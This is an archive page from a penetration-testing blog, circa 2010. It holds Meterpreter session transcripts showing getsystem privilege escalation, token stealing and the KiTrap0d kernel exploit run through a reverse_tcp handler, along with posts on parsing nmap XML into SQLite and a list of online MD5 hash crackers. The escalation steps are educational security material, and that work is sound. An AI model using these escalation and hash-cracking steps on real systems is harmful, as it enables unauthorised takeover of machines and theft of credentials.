Shiny new hotness...
meterpreter > getuid
Server username: WINXPSP3\user **user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Hey I want user back!
meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
steal_token
meterpreter > steal_token -h
[-] Usage: steal_token [pid]
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell <--now uses -t by default Process 1272 created. Channel 2 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user
C:\Documents and Settings\user>
wait I want a SYSTEM shell again
meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
or call execute without -t to use your process token
meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
carnal0wnage and Attack Research join forces!
Friday, January 29, 2010
metasploit getsystem command
KiTrap0d now in metasploit
more for documentation and historical purposes than "new hotness"
original advisory
http://archives.neohapsis.com/archives/fulldisclosure/2010-01/0346.html
"Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack"
Now implemented in Metasploit
msf exploit(handler) > set PAYLOAD windows/meterpreter/
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler on port 443
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (192.168.1.100:443 -> 192.168.1.200:50777)
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > sysinfo
Computer: WINXPSP3
OS : Windows XP (Build 2600, Service Pack 3).
Arch : x86
Language: en_US
meterpreter > run ki
run killav run kitrap0d
meterpreter > run kitrap0d
[*] Currently running as WINXPSP3\user
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\pOOiEDDBFzJ.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\user\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1128)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x29142 bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1316
[?] OpenProcess(1316) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7cc, INFINITE);
[?] GetExitCodeThread(0x7cc, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
**Nipple Rub...**
Friday, January 22, 2010
Ruby, Nmap XML, and Databases
So I had a requirement to take some output from nmap scans, shove it into a database and then be able to run some queries on that data.
Wait, isn't there something that already does that?!
Actually PBNJ and nmap_xml2sql.pl will do this but uses (eeeek!) perl to do it. I wanted to do it in Ruby.
Your options for Ruby & Nmap parsing are:
-rubynmap http://rubynmap.sourceforge.net/
-ruby-nmap http://ruby-nmap.rubyforge.org/
-metasploit has its own nmap xml parser
-writing your own
I started with rubynmap for my parsing gem.
(Note: use the svn version. the version # hasn't changed but the svn version works alot better)
I stole the schema from nmap_xml2sql and added a few things and a scripts table for nmap scripts output and tried shoving that into a sqlite3 database.
TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
version TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER)
TABLE hosts (
sid INTEGER,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4 TEXT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
tcpcount INTEGER,
udpcount INTEGER,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
upstr TEXT)
----SNIP----This "works" but sqlite3 doesn't seem to actually support foreign keys. So while I was correctly assigning a SID value in nmap that value wasn't linking up in hosts and the HID value in subsequent tables. If I'm wrong here please let me know if this works for you as written. For me in populates with nulls and I don't see how its linking back to the tables.
cg@ihatesql:~$ sqlite3 nmapso we can see that the SID and HID are correctly auto incrementing but the SID didn't make it into the hosts table
SQLite version 3.6.21
sqlite> .dump nmap
CREATE TABLE nmap (
sid INTEGER PRIMARY KEY AUTOINCREMENT,
nmapversion TEXT,
xmlversion TEXT,
args TEXT,
types TEXT,
starttime INTEGER,
startstr TEXT,
endtime INTEGER,
endstr TEXT,
numservices INTEGER);
INSERT INTO "nmap" VALUES(1,'4.90RC1','1.03','nmap -A -oX test.xml 209.20.85.250','connect',1262181807,'Wed Dec 30 09:03:27 2009',1262181814,'Wed Dec 30 09:03:34 2009',1000);
COMMIT;
sqlite> .dump hosts
CREATE TABLE hosts (
sid INTEGER ,
hid INTEGER PRIMARY KEY AUTOINCREMENT,
ip4num INTEGER,
hostname TEXT,
status TEXT,
mac TEXT,
vendor TEXT,
ip6 TEXT,
distance INTEGER,
uptime TEXT,
starttime INTEGER,
endtime INTEGER,
);
INSERT INTO "hosts" VALUES(NULL,1,'209.20.85.250','209-20-85-250.slicehost.net','up','','','','','',1262181807,1262181814);
COMMIT;
**Actually sqlite3 as of 3.6.19 supports foreign keys...by adding a
FOREIGN KEY(sid) REFERENCES nmap(sid) to the hosts table and so on. And by declaring PRAGMA foreign_keys = ON.
BUT I still couldn't get it to work.
doing a db.execute("PRAGMA foreign_keys = ON") wasn't working for me. I received no errors but doing a dump on the table would list the foreign key support as OFF :-( maybe its a gem issue?
So to cheat I added ip4num, ip6, hostname to tables i knew I'd be querying a lot like ports and scripts.
CREATE TABLE ports (
hid INTEGER,
ip4num INTEGER,
ip6 TEXT,
port INTEGER,
state TEXT,
reason TEXT,
name TEXT,
tunnel TEXT,
product TEXT,
version TEXT,
extra TEXT,
confidence INTEGER,
method TEXT,
proto TEXT,
owner TEXT,
rpcnum TEXT,
fingerprint TEXT,
FOREIGN KEY(hid) REFERENCES hosts(hid)
)
That way, querying for open ports or specific versions of a service were possible and I could still get an IP associated with that. A bit harder to pull all that information together but still there and a select * from ports; or select ip4num from ports where port = 1521; would return quick results.
So code or it didn't happen...
nmap-parse takes an nmap xml file and spits out some of the results
http://carnal0wnage.attackresearch.com/sites/default/files/nmap-parse.txt
rubynmapsqlite3 takes an nmapfile and database name (optional), creates or connects to the database, populates the tables if it needs to, parses the nmap xml and puts it into its appropriate tables.
http://carnal0wnage.attackresearch.com/sites/default/files/nmapsqlite3.txt
ruby-nmap-parse uses the ruby-nmap gem to parse nmap xml files
http://carnal0wnage.attackresearch.com/sites/default/files/ruby-nmap-parse.txt
caveats:
-my ruby coding sucks.
-my SQL coding sucks worse.
-code is released in "works for me" status
-send diffs not complaints :-) unless you go crazy with it, in which case just send me a link to your code
Next up pushing that data into a postgres database instead of sqlite3.
Monday, January 11, 2010
Various Online Password Crackers
Just a list of online (mostly) md5 crackers but some with do others
This post over on pcsec got me thinking about them.
http://www.pcsec.org/archives/MD5Seacrh-v18-by-mass.html
Of course not all those are working, least not for me.
So here is that list with links and a few others thanks to my twitter homies
passcracking.ru http://passcracking.ru/
md5crack http://md5crack.com/
md5decryption: http://md5decryption.com/
TheKaine.de: http://md5.thekaine.de/
AuthSecu: http://authsecu.com/decrypter-dechiffrer-cracker-hash-md5/decrypter-dechiffrer-cracker-hash-md5.php
hackcrack: http://hashcrack.com/index.php
insidepro: http://hash.insidepro.com/
md5decrypter: http://md5decrypter.com/
md5pass.info: http://md5pass.info/
Bonus points for two of the sites from the screen shot just giving you a parallels plesk login.
Sites specifically mentioned to me in no particular order
Plain-Text.info http://plain-text.info/add/ (also has IRC support)
Hashkiller: http://hashkiller.com/password/
Cryptohaze: http://www.cryptohaze.com/addhashes.php
md5rednoize: http://md5.rednoize.com/
milw0rm: http://milw0rm.com/cracker/insert.php
GData: http://gdataonline.com/seekhash.php
c0llision: http://www.c0llision.net/webcrack.php (also has IRC support)
PassCracking http://passcracking.com/
For fun, a metasploit module that submits the hash to md5crack.com and displays the password if its found.
Lastly, for fun, a metasploit module that submits the hash to md5crack.com and displays the password if its found.
msf auxiliary(md5check_md5crack) > run
[*] Sending 098f6bcd4621d373cade4e832627b4f6 hash to md5crack.com...
[*] plaintext md5 is: test
[*] Auxiliary module execution completed
link:
I started to do more than just md5crack but writing regex's for different sites just seemed like a waste of time.
Sunday, December 27, 2009
2009 Blog Stats
Since everyone else is doing it...
Top 10 posts of of the year 12/26/2008 - 12/26/2009 - blogspot
Adding your own exploits and modules in Metasploit
http://carnal0wnage.blogspot.com/2008/07/adding-your-own-exploits-in-metasploit.html
Gray Hat Python: Python Programming for Hackers and Reverse Engineers Book Review
http://carnal0wnage.blogspot.com/2009/05/gray-hat-python-python-programming-for.html
Dumping Memory to Extract Password Hashes
http://carnal0wnage.blogspot.com/2009/03/dumping-memory-to-extract-password.html
Using the Metasploit SMB Sniffer Module
http://carnal0wnage.blogspot.com/2009/04/using-metasploit-smb-sniffer-module.html
Metasploit and WMAP
http://carnal0wnage.blogspot.com/2008/11/metasploit-and-wmap_24.html
Metasploit + Karma=Karmetasploit Part 1
http://carnal0wnage.blogspot.com/2008/08/playing-with-karmasploit-part-1.html
Token Passing with Incognito
http://carnal0wnage.blogspot.com/2008/05/token-passing-with-incognito.html
Metasploit + Karma=Karmetasploit Part 2
http://carnal0wnage.blogspot.com/2008/08/metasploit-karmakarmasploit-part-2.html
Getting your smartcard to work with Ubuntu
http://carnal0wnage.blogspot.com/2008/11/getting-your-smartcard-to-work-with.html
msvctl -- pass the hash action
http://carnal0wnage.blogspot.com/2008/03/msvctl-pass-hash-action.html
Top 10 posts of of the year 12/26/2008 - 12/26/2009 -- AttackResearch
Release of the TOR Backdoor
http://carnal0wnage.attackresearch.com/node/376
Coming soon to a pentest near you... (assagi teaser)
http://carnal0wnage.attackresearch.com/node/366
Microsoft DirectShow MPEG2TuneRequest Stack Overflow P0C
http://carnal0wnage.attackresearch.com/node/370
Why I hate web app pentesting...
http://carnal0wnage.attackresearch.com/node/383
PDF Defiling Intro
http://carnal0wnage.attackresearch.com/node/362
Past, Present, and Future of Security and the Security Community
http://carnal0wnage.attackresearch.com/node/395
Failing the Test of Trust (guest post By Timelord)
http://carnal0wnage.attackresearch.com/node/386
More On Metasploit Meterpreter & Timestomp
http://carnal0wnage.attackresearch.com/node/390
Security Conferences, pen tests and incident response
http://carnal0wnage.attackresearch.com/node/361
Metasploit JSP Shells
http://carnal0wnage.attackresearch.com/node/389
Top 10 Keywords that brought people to the blog -blogspot
carnal0wnage
gsecdump
karmetasploit
carnal ownage
msvctl
metasploit oracle
metasploit
carnalownage
scapy
c:\windows\system32\2.exe
Top 10 Keywords that brought people to the blog - AttackResearch
metasploit oracle
client-side penetration testing notacon edition slides
node/24
carnal0wnage
ping sweep
tor backdoor
attack research
msvctl
phishing framework
maltego download
Top 10 Referring Sites - blogspot
ethicalhacker.net
metasploit.com
google.com
twitter.com
forums.remote-exploit.org
blogger.com
learnsecurityonline.com
carnal0wnage.com
penetrationtests.com
synjunkie.blogspot.com
Top 10 Referring Sites - AttackResearch
carnal0wnage.blogspot.com
ethicalhacker.net
blog.attackresearch.com
google.com
twitter.com
blog.metasploit.com
attackresearch.com
pentoo.ch
learnsecurityonline.com
pauldotcom.com
Top 10 Countries - blogspot
United States
United Kingdom
France
Germany
India
Canada
Italy
Spain
Australia
Brazil
Top 10 Countries - AttackResearch
United States
United Kingdom
France
India
Canada
Germany
Indonesia
Spain
Italy
Australia
Friday, December 18, 2009
Beating Up On Oracle Book List
Need some last minute books to beat up on Oracle? Here's a list.
(you'll have to go to the rampant press site http://www.rampant-books.com/book_0701_oracle_forensics.htm)
Friday, December 11, 2009
Hackers -- Net Cafe Series Video circa 1996
From the old skool files...
This is the very first episode of the Net Cafe series. It was shot on location at a cybercafe in San Francisco called CoffeeNet. It looks at the hacker culture and their influence on the early growth of the internet. Guests include Dan Farmer, author of SATAN and COPS; Elias Levi (aka Aleph 1), webmaster of underground.org and Bugtraq; also "Reid Fleming" and "White Knight" from Cult of the Dead Cow. Originally broadcast in 1996.
